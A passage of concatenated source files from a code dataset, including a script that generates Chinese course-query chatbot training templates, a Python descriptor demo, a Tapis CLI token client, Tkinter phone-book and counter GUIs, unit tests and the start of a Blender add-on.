Template('{{ask}}{{when}}{{designated_for}}的{{title}}是哪位教授'),\n\n ],\n 'request_schedule_str': [\n Template('什麼時候的課'),\n Template('上課時間在什麼時候'),\n Template('什麼時候上課'),\n Template('星期幾上課'),\n Template('幾點上課'),\n Template('第幾節的課'),\n Template('上課時間'),\n Template('在第幾節'),\n Template('{{title}}的上課時間'),\n Template('{{title}}幾點上課'),\n Template('{{title}}在哪天上課'),\n Template('{{title}}是星期幾的課'),\n Template('{{title}}是第幾節的課'),\n Template('{{title}}課上課時間'),\n Template('{{title}}課幾點上課'),\n Template('{{title}}課在哪天上課'),\n Template('{{title}}課是星期幾的課'),\n Template('{{title}}課是第幾節的課'),\n Template('星期幾有{{title}}'),\n Template('什麼時候有{{title}}'),\n Template('星期幾有{{title}}課'),\n Template('什麼時候有{{title}}課'),\n Template('星期幾有{{title}}的課'),\n Template('{{instructor}}在星期幾有課'),\n Template('星期幾有{{instructor}}老師的課'),\n Template('什麼時候有{{instructor}}老師的課'),\n Template('{{instructor}}老師的{{title}}課在什麼時候'),\n Template('{{instructor}}老師的{{title}}課在什麼時候上課'),\n Template('{{instructor}}老師的{{title}}課在星期幾'),\n Template('{{instructor}}老師的{{title}}課在幾點'),\n Template('{{instructor}}老師的{{title}}課在什麼時間'),\n Template('{{instructor}}老師的{{title}}課在什麼時間上課'),\n ],\n 'request_classroom': [\n Template('在哪裡上課'),\n Template('教室在哪'),\n Template('哪間教室'),\n Template('在哪邊上'),\n Template('{{title}}在哪裡上課'),\n Template('{{title}}課在哪裡上課'),\n Template('{{title}}的上課教室在哪'),\n Template('{{title}}課的上課教室在哪'),\n Template('{{title}}的教室在哪'),\n Template('{{title}}課的教室在哪'),\n Template('{{title}}課的教室'),\n Template('{{title}}的教室'),\n Template('{{title}}的上課地點'),\n Template('{{title}}的地點'),\n Template('在那裡上{{title}}'),\n Template('{{instructor}}的課在哪間教室'),\n Template('{{instructor}}的課在哪裡'),\n Template('{{instructor}}老師{{when}}的課在哪間教室'),\n Template('{{instructor}}老師{{when}}的課在哪裡'),\n Template('{{instructor}}老師{{when}}的課在哪間教室上課'),\n Template('{{instructor}}老師{{when}}的課在哪裡上課'),\n Template('{{instructor}}教授{{when}}的課在哪間教室'),\n Template('{{instructor}}教授{{when}}的課在哪裡'),\n Template('{{instructor}}教授{{when}}的課在哪間教室上課'),\n Template('{{instructor}}教授{{when}}的課在哪裡上課'),\n Template('{{when}}{{instructor}}老師的課在哪間教室'),\n Template('{{when}}{{instructor}}老師的課在哪裡上課'),\n Template('{{when}}{{instructor}}老師的課在哪裡'),\n Template('{{when}}{{instructor}}教授的課在哪間教室'),\n Template('{{when}}{{instructor}}教授的課在哪裡上課'),\n Template('{{when}}{{instructor}}教授的課在哪裡')\n\n ],\n 'request_review': [\n Template('{{title}}的評價如何'),\n Template('有沒有{{title}}的評價'),\n Template('{{instructor}}的評價如何'),\n Template('這堂課怎麼樣'),\n Template('{{title}}這堂課的評價怎樣'),\n Template('{{title}}的評價好嗎'),\n Template('大家怎麼看{{title}}這堂課呢'),\n Template('{{title}}這堂課好不好'),\n Template('大家修{{title}}這堂課的評價如何'),\n Template('有討論{{title}}的文章嗎'),\n Template('有討論{{title}}這堂課的文章嗎'),\n Template('{{instructor}}老師的評價如何'),\n Template('大家覺得{{instructor}}老師的評價如何'),\n Template('大家覺得{{instructor}}老師的評價怎樣'),\n Template('{{instructor}}老師的評價'),\n Template('有討論{{instructor}}老師文章嗎')\n ],\n 'request_designated_for': [\n Template('{{title}}是哪個系開的'),\n Template('{{title}}是哪個系所開的'),\n Template('什麼系開的'),\n Template('什麼系所的課'),\n Template('{{title}}是��個系的課'),\n Template('{{title}}是哪個系所的課'),\n Template('哪個系開{{title}}這堂課'),\n Template('哪個系開{{title}}'),\n Template('哪個系所開{{title}}這堂課'),\n Template('哪個系所有開{{title}}這堂課'),\n Template('{{instructor}}在哪個系有開課'),\n Template('{{instructor}}在哪個系所有開課')\n\n ],\n 'request_required_elective': [\n Template('是必修還選修'),\n Template('是{{designated_for}}必修嗎?'),\n Template('{{designated_for}}的必修嗎?'),\n Template('{{title}}是{{designated_for}}的必修嗎'),\n Template('{{title}}是{{designated_for}}的必修課嗎'),\n Template('{{title}}是必修嗎'),\n Template('{{instructor}}有開必修課嗎'),\n Template('{{when}}有{{designated_for}}的必修課嗎'),\n Template('有{{instructor}}開的必修課嗎')\n\n ],\n 'request_sel_method': [\n Template('{{title}}的加選方式是什麼'),\n Template('{{title}}的加選方式?'),\n Template('{{title}}如何加選?'),\n Template('{{title}}要怎麼加選?'),\n Template('{{title}}怎樣加簽?'),\n Template('{{instructor}}會開放加簽嗎?'),\n Template('{{instructor}}有開放加簽嗎'),\n Template('{{instructor}}會不會簽人'),\n Template('{{instructor}}通常會不會加簽'),\n Template('{{title}}這堂課要怎麼加簽?'),\n Template('{{title}}這堂課的加選方式是什麼'),\n Template('{{title}}這堂課的加選方式?'),\n Template('{{title}}這堂課如何加選?'),\n Template('{{title}}這堂課要怎麼加選?'),\n Template('{{title}}這堂課怎樣加簽?'),\n Template('{{title}}怎樣加簽?')\n ],\n 'inform': [\n Template('{{be}}{{title}}'),\n Template('叫{{title}}'),\n Template('叫做{{title}}'),\n Template('{{title}}喔'),\n Template('{{be}}{{when}}'),\n Template('{{be}}{{when}}的課'),\n Template('{{be}}{{when}}上課'),\n Template('{{be}}{{when}}上的'),\n Template('{{be}}{{instructor}}'),\n Template('{{be}}{{instructor}}老師'),\n Template('{{be}}{{instructor}}教授'),\n Template('{{be}}{{instructor}}的課'),\n Template('{{be}}{{classroom}}'),\n Template('在{{classroom}}上課'),\n Template('上課地點是{{classroom}}'),\n Template('教室在{{classroom}}'),\n Template('{{be}}{{designated_for}}'),\n Template('{{be}}{{designated_for}}開的'),\n Template('{{be}}{{designated_for}}的課'),\n Template('{{be}}{{designated_for}}上的'),\n Template('{{be}}{{required_elective}}'),\n Template('{{be}}{{required_elective}}課'),\n Template('{{be}}{{required_elective}}的課'),\n Template('{{be}}{{sel_method}}'),\n Template('加選方法{{be}}{{sel_method}}'),\n Template('選課方法{{be}}{{sel_method}}'),\n Template('{{be}}{{sel_method}}'),\n ],\n 'inform_unknown': [ # prevent infinite loop\n Template('不知道'),\n Template('我不知道'),\n Template('不知道耶'),\n Template('我真的不知道啦'),\n Template('不清楚'),\n Template('我不清楚'),\n Template('我真的不清楚'),\n Template('不知'),\n Template('不確定'),\n Template('我知道還要問你嗎'),\n Template('不要問我'),\n Template('別問我'),\n Template('我怎麼知道')\n ],\n 'thanks': [\n Template('謝謝'),\n Template('感謝你'),\n Template('感恩'),\n ],\n 'deny': [\n Template('錯了'),\n Template('爛耶'),\n Template('太爛了吧'),\n Template('大錯特錯'),\n ],\n 'closing': [\n Template('再見'),\n ],\n 'other': [\n Template('快被當了怎模辦QQ'),\n Template('什麼時候可以停修QQ'),\n Template('學海無涯,回頭是岸'),\n Template('想畢業'),\n Template('我不想上課QQ'),\n Template('想耍廢'),\n Template('我好廢怎麼辦'),\n Template('人生好困難'),\n Template('智商不夠好痛苦'),\n Template('通識搶不到怎麼辦'),\n Template('你可以聰明一點嗎'),\n Template('什麼時候期末考'),\n Template('羨慕大神人生都沒有挫折'),\n Template('好魯'),\n Template('呵呵'),\n Template('我啥都不會'),\n Template('智商不夠可以砍掉重來嗎QQ'),\n Template('ㄎㄅ'),\n Template('是個擅長講幹話的朋友呢'),\n Template('不想看紙'),\n Template('沒錢'),\n Template('給我一把人生重來槍'),\n Template('午餐吃啥'),\n Template('晚餐吃啥'),\n Template('早餐吃啥'),\n Template('冰咖啡買一送一不加糖'),\n Template('這真的可以嗎'),\n Template('���婷大大凱瑞眾生'),\n Template('謝謝大大分享'),\n Template('我好邊緣'),\n Template('樓主一生平安順利'),\n Template('一號餐要薯餅冰那提少冰加糖'),\n Template('麥當當好吃'),\n ]\n}\n\n\ndef trim_course(course):\n course['when'] = random.choice(['星期', '禮拜']) + course['schedule_str'][0]\n course['be'] = random.choice(be)\n course['ask'] = random.choice(ask)\n for k in ['title', 'instructor', 'classroom']:\n course[k] = trim_attr(course[k])\n return course\n\nif __name__ == '__main__':\n \"\"\"\n In this format:\n Line1: Intent\n Line2: Tokenized sentence\n Line3: BIO\n ======\n classroom\n 禮拜三 高分子材料概論 在 哪個 系館 哪間 教室 上課 嗎 ?\n B_when B_title O O O O O O O O\n title\n 幫 我 找 吳俊傑 教 哪些 課 ?\n O O O B_instructor O O O O\n \"\"\"\n print('[Info] Start generating templates')\n # TODO Change to argparse\n filename = 'training_template.txt'\n N = 1000\n courses = query_course({}).values() # Get all course\n # TODO Refine request_schedule_str to when\n #\n with open(filename, 'w') as f:\n for intent, tpls in templates.items():\n for tpl in tpls:\n for _ in range(N):\n course = random.choice(courses)\n course = trim_course(course)\n # Jieba cut sentence\n sentence = ' '.join(cut(tpl.render(Context(course))))\n # BIO tagged sentence\n bio_tagged = ' '.join(BIO(sentence, course))\n\n f.write(intent + '\\n')\n f.write(sentence + '\\n')\n f.write(bio_tagged + '\\n')\n","sub_path":"misc_scripts/generate_template.py","file_name":"generate_template.py","file_ext":"py","file_size_in_byte":13574,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"460972731","text":"#!/usr/bin/env python3\n# -*- coding: UTF-8 -*-\n\n\"\"\"\n一个描述器是一个类, 内部定义了方法 __get__, __set__, __delete__ 中的一个或多个\n\na.x 的查找顺序是, a.__dict__['x'] , 然后 type(a).__dict__['x'] , 然后找 type(a) 的父类\n( 不包括元类 (metaclass) ).如果查找到的值是一个描述器, Python 就会调用描述器的方法来重写默认的行为\n\"\"\"\n\n\nclass User(object):\n def __init__(self, name='两点水', sex='男'):\n self.sex = sex\n self.name = name\n\n def __get__(self, obj, objtype):\n print('获取 name 值')\n return self.name\n\n def __set__(self, obj, val):\n print('设置 name 值')\n self.name = val\n\n\nclass MyClass(object):\n x = User('两点水', '男')\n y = 5\n\n\nif __name__ == '__main__':\n m = MyClass()\n user = User('xy', 'male')\n print(m.x) # m.x 是一个 User, 而User是一个descriptor, 可以通过 __get__方法描述\n print(user)\n\n print('\\n')\n\n m.x = '三点水'\n print(m.x) # 此时 x 不是一个描述器了\n\n print('\\n')\n\n print(m.x)\n\n print('\\n')\n\n print(m.y)\n","sub_path":"basic/descriptor_demo.py","file_name":"descriptor_demo.py","file_ext":"py","file_size_in_byte":1123,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"588133054","text":"#0318 입력한 문장에 존재하는 알파벳 모두 골라내기(중복 x)\n\nuserstr = str(input(\"원하는 문장을 입력하세요.\")) ##중요 : 문자열로 취급 str()\nstr0 = userstr.replace(' ','')\n\nalphabet = [] #<주의!!!> 빈 리스트 만들기는 [] , 빈 문자열 변수 만들기가 \"\" \n\nfor i in str0:\n for j in range(0,len(alphabet)):\n if i!=alphabet[j]:\n alphabet.append(i)\n\n\nprint(\"입력한 알파벳 : \",alphabet)\n\n#공백제거 함수 뭐였지? 답:https://code.i-harness.com/ko/q/7e310c\n\n#길이 출력하는 함수!! len(변수)\n","sub_path":"0318 입력한 문장에 존재하는 알파벳 모두 골라내기(중복 x).py","file_name":"0318 입력한 문장에 존재하는 알파벳 모두 골라내기(중복 x).py","file_ext":"py","file_size_in_byte":583,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"283242924","text":"import unittest\nimport os\n\nfrom testutils import getZserioApi, getApiDir\n\nclass SubtypedTableTest(unittest.TestCase):\n @classmethod\n def setUpClass(cls):\n cls.api = getZserioApi(__file__, \"sql_tables.zs\", expectedWarnings=1)\n cls._fileName = os.path.join(getApiDir(os.path.dirname(__file__)), \"subtyped_table_test.sqlite\")\n\n def setUp(self):\n if os.path.exists(self._fileName):\n os.remove(self._fileName)\n self._database = self.api.TestDb.from_file(self._fileName)\n self._database.create_schema()\n\n def tearDown(self):\n self._database.close()\n\n def testSubtypedTable(self):\n self.assertTrue(self._isTableInDb())\n\n subtypedTable = self._database.subtyped_table\n self.assertTrue(subtypedTable is not None)\n\n def _isTableInDb(self):\n # check if database does contain table\n sqlQuery = \"SELECT name FROM sqlite_master WHERE type='table' AND name='\" + self.TABLE_NAME + \"'\"\n for row in self._database.connection.cursor().execute(sqlQuery):\n if len(row) == 1 and row[0] == self.TABLE_NAME:\n return True\n\n return False\n\n TABLE_NAME = \"subtypedTable\"\n","sub_path":"test/language/sql_tables/python/SubtypedTableTest.py","file_name":"SubtypedTableTest.py","file_ext":"py","file_size_in_byte":1192,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"455507541","text":"from agavepy.agave import Agave\nfrom .base import TaccApisCommandBase\nimport inspect\n\n__all__ = ['TaccApisBearer', 'TaccApisNoBearer']\n\n\nclass TaccApisBearer(TaccApisCommandBase):\n \"\"\"Base class for Tapis API commands that accept only an access token\n \"\"\"\n def add_common_parser_arguments(self, parser):\n parser = super(TaccApisBearer,\n self).add_common_parser_arguments(parser)\n parser.add_argument('-z',\n '--token',\n dest='access_token',\n metavar='',\n help=\"{0} {1}\".format(self.constants.PLATFORM,\n self.constants.ACCESS_TOKEN))\n return parser\n\n def init_clients(self, parsed_args):\n \"\"\"Override CommandBase to set up client with passed token\n \"\"\"\n client = Agave.restore()\n if parsed_args.access_token is not None:\n self.tapis_client = Agave(api_server=client.api_server,\n token=parsed_args.access_token)\n else:\n self.tapis_client = client\n self.tapis_client.token.refresh()\n self.requests_client = self._get_direct(self.tapis_client)\n return self\n\n\nclass TaccApisNoBearer(TaccApisCommandBase):\n \"\"\"Base class for Tapis API commands that accept only an access token\n \"\"\"\n def add_common_parser_arguments(self, parser):\n parser = super(TaccApisNoBearer,\n self).add_common_parser_arguments(parser)\n return parser\n","sub_path":"tapis_cli/clients/services/taccapis/v2/bearer.py","file_name":"bearer.py","file_ext":"py","file_size_in_byte":1598,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"429709982","text":"from tkinter import *\nfrom interface.createHelper import *\n\n\ndef soonBirthday():\n response = requests.get(URL + f\"contacts/?soon=True\")\n sendFilterBox = createToplevel(600, 400, \"#FF00FF\", root=root)\n frame = createScrollFrame(sendFilterBox, \"#FF00FF\")\n enterContacts(frame=frame, contacts=response.json())\n\n\ndef searchBirthday():\n def sendSearch():\n if validDayAndMonth(day.get(), month.get()):\n response = requests.get(URL + f\"contacts/?day={day.get()}&month={month.get()}\")\n if response.status_code != 200 or response.json() == []:\n messagebox.showerror(title=\"Ошибка\", message=\"Нет таких контактов\")\n return\n sendFilterBox = createToplevel(600, 400, \"#FF00FF\", root=root)\n frame = createScrollFrame(sendFilterBox, \"#FF00FF\")\n enterContacts(frame=frame, contacts=response.json())\n else:\n return\n\n searchBox = createToplevel(500, 200, \"#FFDEAD\", root)\n Label(searchBox, text=\"Введите месяц:\", font=40, bg='#FFDEAD', justify=LEFT).grid(row=0, column=0)\n month = Entry(searchBox, width=31, font=40)\n month.grid(row=0, column=1)\n Label(searchBox, text=\"Введите день:\", font=40, bg='#FFDEAD', justify=LEFT).grid(row=1, column=0)\n day = Entry(searchBox, width=31, font=40)\n day.grid(row=1, column=1)\n Button(searchBox, text='Узнать', bg='#ADFF2F', command=sendSearch).grid(row=34)\n\n\ndef differenceBirthday():\n def GT():\n creatorDifferentOrEqualsFunc(params=\"GT\", number=number, URL=URL, root=differenceBirthdayBox)\n\n def LT():\n creatorDifferentOrEqualsFunc(\"LT\", number=number, URL=URL, root=differenceBirthdayBox)\n\n def equals():\n creatorDifferentOrEqualsFunc(\"equals\", number=number, URL=URL, root=differenceBirthdayBox)\n\n differenceBirthdayBox = createToplevel(500, 150, \"#FFDEAD\", root)\n Label(differenceBirthdayBox, text=\"Введите количество лет:\", font=40, bg='#FFDEAD', justify=LEFT).grid(row=0,\n column=0)\n number = Entry(differenceBirthdayBox, width=31, font=40)\n number.grid(row=0, column=1)\n Button(differenceBirthdayBox, text='Больше', bg='#ADFF2F', command=GT).grid(row=1)\n Button(differenceBirthdayBox, text='Меньше', bg='#ADFF2F', command=LT).grid(row=2)\n Button(differenceBirthdayBox, text='Равно', bg='#ADFF2F', command=equals).grid(row=3)\n\n\ndef getAge():\n def sendGetAge():\n response = requests.get(URL + f\"contacts/?name={name.get().title()}&surname={surname.get().title()}\")\n if response.status_code != 200 or response.json() == []:\n messagebox.showerror(title=\"Ошибка\", message=\"Контакта с таким именим и фамилией нет\")\n else:\n\n messagebox.showinfo(title=\"Успешно\",\n message=f\"Возраст контакта: {age(str(response.json()[0]['birthday']))}\")\n getAgeBox.destroy()\n\n getAgeBox = createToplevel(500, 200, \"#FFDEAD\", root)\n Label(getAgeBox, text=\"Введите Имя:\", font=40, bg='#FFDEAD', justify=LEFT).grid(row=0, column=0)\n name = Entry(getAgeBox, width=31, font=40)\n name.grid(row=0, column=1)\n Label(getAgeBox, text=\"Введите Фамилию:\", font=40, bg='#FFDEAD', justify=LEFT).grid(row=1, column=0)\n surname = Entry(getAgeBox, width=31, font=40)\n surname.grid(row=1, column=1)\n Button(getAgeBox, text='Узнать', bg='#ADFF2F', command=sendGetAge).grid(row=34)\n\n\ndef filterContacts():\n def sendFilterContacts():\n correctNumber = number.get()\n if not validNumberAndBirthday(correctNumber):\n return\n if not validNumberAndBirthday(birthday=birthday.get()):\n return\n if not validData(birthday.get()):\n return\n if re.match(r\"\\+7\\d\\d\\d\\d\\d\\d\\d\\d\\d\\d\", str(correctNumber)):\n correctNumber = correctNumber[2:]\n correctNumber = '8' + correctNumber\n requestsText = f\"{URL}contacts/?\"\n if name.get() != \"\":\n requestsText += f\"name={name.get().title()}&\"\n if surname.get() != \"\":\n requestsText += f\"surname={surname.get().title()}&\"\n if birthday.get() != \"\":\n requestsText += f\"birthday={birthday.get()}&\"\n if number.get() != \"\":\n requestsText += f\"numbers={correctNumber}&\"\n response = requests.get(requestsText)\n if response.json() == [] or response.status_code != 200:\n messagebox.showerror(title=\"Ошибка\", message=\"Нет таких контактов\")\n else:\n sendFilterBox = createToplevel(600, 400, \"#FF00FF\", root=root)\n frame = createScrollFrame(sendFilterBox, \"#FF00FF\")\n enterContacts(frame=frame, contacts=response.json())\n\n filterContactsBox = createToplevel(500, 300, \"#FFDEAD\", root=root)\n Label(filterContactsBox, text=\"Введите Имя:\", font=40, bg='#FFDEAD', justify=LEFT).grid(row=0, column=0)\n name = Entry(filterContactsBox, width=31, font=40)\n name.grid(row=0, column=1)\n Label(filterContactsBox, text=\"Введите Фамилию:\", font=40, bg='#FFDEAD', justify=LEFT).grid(row=1, column=0)\n surname = Entry(filterContactsBox, width=31, font=40)\n surname.grid(row=1, column=1)\n Label(filterContactsBox, text=\"Введите Дату рождения:\", font=40, bg='#FFDEAD', justify=LEFT).grid(row=2, column=0)\n birthday = Entry(filterContactsBox, width=31, font=40)\n birthday.grid(row=2, column=1)\n Label(filterContactsBox, text=\"Введите Номер:\", font=40, bg='#FFDEAD', justify=LEFT).grid(row=3, column=0)\n number = Entry(filterContactsBox, width=31, font=40)\n number.grid(row=3, column=1)\n Label(filterContactsBox, text=\"Заполните нужные поля:\", font=40, bg='#FFDEAD').grid(row=4, column=0)\n Button(filterContactsBox, text='Отфильтровать', bg='#ADFF2F', command=sendFilterContacts).grid(row=4, column=1)\n\n\ndef deleteContactByNumber():\n def sendContactDelete():\n def sendContacts():\n for count, contact in enumerate(contactsDelete):\n if checkboxs[count].get() == 1:\n requests.delete(URL + f\"contactDelete/{contact}\")\n messagebox.showinfo(title=\"Успешно\", message=\"Контакт удалён\")\n deletsBox.destroy()\n\n correctNumber = number.get()\n if not validNumberAndBirthday(correctNumber=correctNumber):\n return\n if correctNumber[0] == \"+\":\n correctNumber = \"8\" + correctNumber[2:]\n response = requests.get(URL + f\"contacts/?numbers={correctNumber}\")\n if response.status_code == 204 or response.status_code == 404 or response.json() == []:\n messagebox.showerror(title=\"Ошибка\", message=\"Контакта с таким номером нет\")\n else:\n deleteContactBox.destroy()\n deletsBox = createToplevel(700, 700, \"#FF00FF\", root=root)\n frame = createScrollFrame(deletsBox, \"#FF00FF\")\n checkboxs, contactsDelete, countRow = chooseContacts(frame=frame, contacts=response.json())\n Button(frame, text='Удалить', bg='#ADFF2F', command=sendContacts).grid(row=countRow + 2)\n\n deleteContactBox = createToplevel(500, 150, \"#FFDEAD\", root)\n Label(deleteContactBox, text=\"Введите Номер:\", font=40, bg='#FFDEAD', justify=LEFT).grid(row=0, column=0)\n number = Entry(deleteContactBox, width=31, font=40)\n number.grid(row=0, column=1)\n Button(deleteContactBox, text='Удалить', bg='#ADFF2F', command=sendContactDelete).grid(row=1)\n\n\ndef deleteContactByNameAndSurname():\n def sendContactDelete():\n response = requests.delete(URL + f\"contactDelete/{name.get().title()}&{surname.get().title()}\")\n if response.status_code == 204 or response.status_code == 404:\n messagebox.showerror(title=\"Ошибка\", message=\"Контакта с таким именим и фамилией нет\")\n else:\n messagebox.showinfo(title=\"Успешно\", message=\"Контакт удалён\")\n deleteContactBox.destroy()\n\n deleteContactBox = createToplevel(500, 200, \"#FFDEAD\", root)\n Label(deleteContactBox, text=\"Введите Имя:\", font=40, bg='#FFDEAD', justify=LEFT).grid(row=0, column=0)\n name = Entry(deleteContactBox, width=31, font=40)\n name.grid(row=0, column=1)\n Label(deleteContactBox, text=\"Введите Фамилию:\", font=40, bg='#FFDEAD', justify=LEFT).grid(row=1, column=0)\n surname = Entry(deleteContactBox, width=31, font=40)\n surname.grid(row=1, column=1)\n Button(deleteContactBox, text='Удалить', bg='#ADFF2F', command=sendContactDelete).grid(row=34)\n\n\ndef updateContact():\n def sendContactUpdate():\n def sendContact():\n if creatorSendContact(URL=URL, name=name, surname=surname, birthday=birthday, numbers=numbers,\n isUpdate=True, updateName=intputName, updateSurname=inputSurname):\n createContactsBox.destroy()\n\n inputSurname = surnameInst.get()\n intputName = nameInst.get()\n response = requests.get(URL + f\"contacts/?name={intputName.title()}&surname={inputSurname.title()}\")\n if response.json() != [] or response.status_code != 200:\n updateContactBox.destroy()\n createContactsBox = createToplevel(500, 840, \"#FFDEAD\", root=root)\n name, surname, birthday, numbers = creatorFieldsForContact(createContactsBox, response=response)\n Button(createContactsBox, text='Обновить', bg='#ADFF2F', command=sendContact).grid(row=34)\n else:\n messagebox.showerror(title=\"Ошибка\", message=\"Контакта с таким именим и фамилией нет\")\n\n updateContactBox = createToplevel(500, 200, \"#FFDEAD\", root)\n Label(updateContactBox, text=\"Введите Имя:\", font=40, bg='#FFDEAD', justify=LEFT).grid(row=0, column=0)\n nameInst = Entry(updateContactBox, width=31, font=40)\n nameInst.grid(row=0, column=1)\n Label(updateContactBox, text=\"Введите Фамилию:\", font=40, bg='#FFDEAD', justify=LEFT).grid(row=1, column=0)\n surnameInst = Entry(updateContactBox, width=31, font=40)\n surnameInst.grid(row=1, column=1)\n Button(updateContactBox, text='Обновить', bg='#ADFF2F', command=sendContactUpdate).grid(row=34)\n\n\ndef createContacts():\n def sendContact():\n if creatorSendContact(URL=URL, name=name, surname=surname, birthday=birthday, numbers=numbers):\n createContactsBox.destroy()\n return\n\n createContactsBox = createToplevel(500, 840, \"#FFDEAD\", root=root)\n name, surname, birthday, numbers = creatorFieldsForContact(createContactsBox=createContactsBox)\n Button(createContactsBox, text='Создать', bg='#ADFF2F', command=sendContact).grid(row=34)\n\n\ndef getAllContacts():\n response = requests.get(URL + \"contacts/\")\n if response.json() == [] or response.status_code != 200:\n messagebox.showerror(title=\"Ошибка\", message=\"На данный момент в базе данных нет контактов\")\n else:\n allContactsBox = createToplevel(600, 400, \"#FFC0CB\", root=root)\n frame = createScrollFrame(allContactsBox, \"#FFC0CB\")\n enterContacts(frame=frame, contacts=response.json())\n\n\nif __name__ == '__main__':\n root = Tk()\n\n root['bg'] = '#fafafa'\n URL = \"http://127.0.0.1:8000/api/\"\n\n root.title('Телефонный справочник')\n root.geometry('600x400')\n root.resizable(width=False, height=False)\n\n frame = Frame(root, bg='#00FFFF')\n frame.place(relwidth=1, relheight=1)\n (Label(frame, text=\"Главное Меню\", font=100, bg='#00FFFF', justify=LEFT)).pack()\n Button(frame, text='Посмотреть все контакты', bg='#FF8C00', command=getAllContacts).pack()\n Button(frame, text='Создать контакт', bg='#FF8C00', command=createContacts).pack()\n Button(frame, text=\"Удалить по имени и фамилии\", bg='#FF8C00', command=deleteContactByNameAndSurname).pack()\n Button(frame, text=\"Фильтр контактов\", bg='#FF8C00', command=filterContacts).pack()\n Button(frame, text=\"Узнать сколько лет\", bg='#FF8C00', command=getAge).pack()\n Button(frame, text=\"Изменить контакт\", bg='#FF8C00', command=updateContact).pack()\n Button(frame, text=\"Удалить контакт по номеру\", bg='#FF8C00', command=deleteContactByNumber).pack()\n Button(frame, text=\"Скоро день рождения\", bg='#FF8C00', command=soonBirthday).pack()\n Button(frame, text=\"Узнать контакты по N лет\", bg='#FF8C00', command=differenceBirthday).pack()\n Button(frame, text=\"Поиск по месяцу и дню рождения\", bg='#FF8C00', command=searchBirthday).pack()\n\n root.mainloop()\n","sub_path":"start.py","file_name":"start.py","file_ext":"py","file_size_in_byte":13181,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"334065021","text":"from tkinter import *\n\ndef doit():\n global x\n x+=1\n txt1.delete(1.0, END)\n txt1.insert(0.0,x)\n\nroot=Tk()\nroot.geometry(\"300x190\")\n\nLabel(root,width=10).grid(row=0,column=0)\nLabel(root).grid(row=1,column=0)\nLabel(root).grid(row=2,column=0)\nLabel(root).grid(row=3,column=0)\n\nButton(root,text=\"Enter\",width=15,height=2,command=doit).grid(row=3,column=1)\ntxt1=Text(root,width=20,height=2)\ntxt1.grid(row=1,column=1)\nroot.bind(\"\", lambda event: doit())\n\nx=0\n\nroot.mainloop()\n","sub_path":"Python Pgms/New folder/Python/skel2.py","file_name":"skel2.py","file_ext":"py","file_size_in_byte":489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"431552215","text":"import bpy, imp\n\nfrom easyGame import easyMaterial\nfrom easyGame import easyAsset\n\nimp.reload(easyMaterial)\nimp.reload(easyAsset)\n\n\nbl_info = {\n\t\"name\": \"Easy Game Collection\",\n\t\"author\": \"Mike Pan\",\n\t\"version\": (1, 2),\n\t\"blender\": (2, 70, 0),\n\t\"location\": \"View3D > Tool Shelf > Easy Tabs\",\n\t\"description\": \"Help make the game-creation process simpler.\",\n\t\"warning\": \"\",\n\t\"wiki_url\": \"\",\n\t\"category\": \"Game Engine\"\n}\n\n\n\ndef register():\n\tbpy.utils.register_class(BLEasyMaterial)\n\tbpy.utils.register_class(BLEasyMaterialAdv)\n\tbpy.utils.register_class(BLEasyAsset)\n\t# bpy.utils.register_class(BLSettings)\n\tbpy.utils.register_class(BLEasyMaterialCreate)\n\tbpy.utils.register_class(BLEasyAssetCreate)\n\n\ndef unregister():\n\tbpy.utils.unregister_class(BLEasyMaterial)\n\tbpy.utils.unregister_class(BLEasyMaterialAdv)\n\tbpy.utils.unregister_class(BLEasyAsset)\n\t# bpy.utils.unregister_class(BLSettings)\n\tbpy.utils.unregister_class(BLEasyMaterialCreate)\n\tbpy.utils.unregister_class(BLEasyAssetCreate)\n\n\n\n###############################################################################\n\n\nclass GamePanel():\n\tbl_space_type = 'VIEW_3D'\n\tbl_region_type = 'TOOLS'\n\n\t\nclass BLEasyMaterial(GamePanel, bpy.types.Panel):\n\t\"\"\"Creates the EasyMaterial UI\"\"\"\n\tbl_label = \"Easy Material\"\n\tbl_category = \"Easy Material\"\n\n\tdef draw(self, context):\n\t\tlayout = self.layout\n\t\tobj = context.object\n\n\t\t# bail on wrong display mode\n\t\tif context.scene.game_settings.material_mode != 'GLSL':\n\t\t\trow = layout.row()\n\t\t\trow.label('EasyMaterial requires GLSL mode', icon='ERROR')\n\t\t\trow = layout.row()\n\t\t\trow.prop(context.scene.game_settings, 'material_mode', text='')\n\t\t\treturn\n\n\t\t# bail on no object (We don't want to use poll because that hides the panel)\n\t\tif not obj:\n\t\t\treturn\n\n\t\t# material datablock manager\n\t\trow = layout.row()\n\t\tlayout.template_ID_preview(obj, \"active_material\", new=\"easy.matcreate\")\n\n\t\t# material editor\n\t\trow = layout.row()\n\t\tfor materialSlot in context.active_object.material_slots:\n\t\t\tmat = materialSlot.material\n\n\t\t\t# bail code\n\t\t\tif not mat:\n\t\t\t\tcontinue\n\t\t\tif 'uberMaterial' not in mat:\n\t\t\t\trow.label('Not an UberMaterial', icon='ERROR')\n\t\t\t\tcontinue\n\n\t\t\t# edit albedo\n\t\t\trow = layout.row()\n\t\t\trow.prop(mat, 'diffuse_intensity', text='Albedo')\n\t\n\t\t\tmetallicTextureSlot = None\n\t\t\tfor textureSlot in mat.texture_slots:\n\t\t\t\tif textureSlot:\n\t\t\t\t\t# bail code\n\t\t\t\t\tif textureSlot.use_map_color_spec and textureSlot.blend_type == 'COLOR':\n\t\t\t\t\t\tcontinue\n\n\t\t\t\t\ttex = textureSlot.texture\n\t\t\t\t\ttext = tex.name.split('.')[-1]\n\t\t\t\t\tif text.isnumeric():\n\t\t\t\t\t\ttext = tex.name.split('.')[-2]\n\n\t\t\t\t\t# move to advanced section\n\t\t\t\t\tif text == 'Emit' or text == 'Alpha':\n\t\t\t\t\t\tcontinue\t\t\t\t\t\t\n\n\t\t\t\t\trow = layout.row()\n\t\t\t\t\t# enable/disable texture channel\n\t\t\t\t\tsplit = layout.split(percentage=0.20)\n\t\t\t\t\trow = split.row()\n\t\t\t\t\trow.prop(textureSlot, 'use', 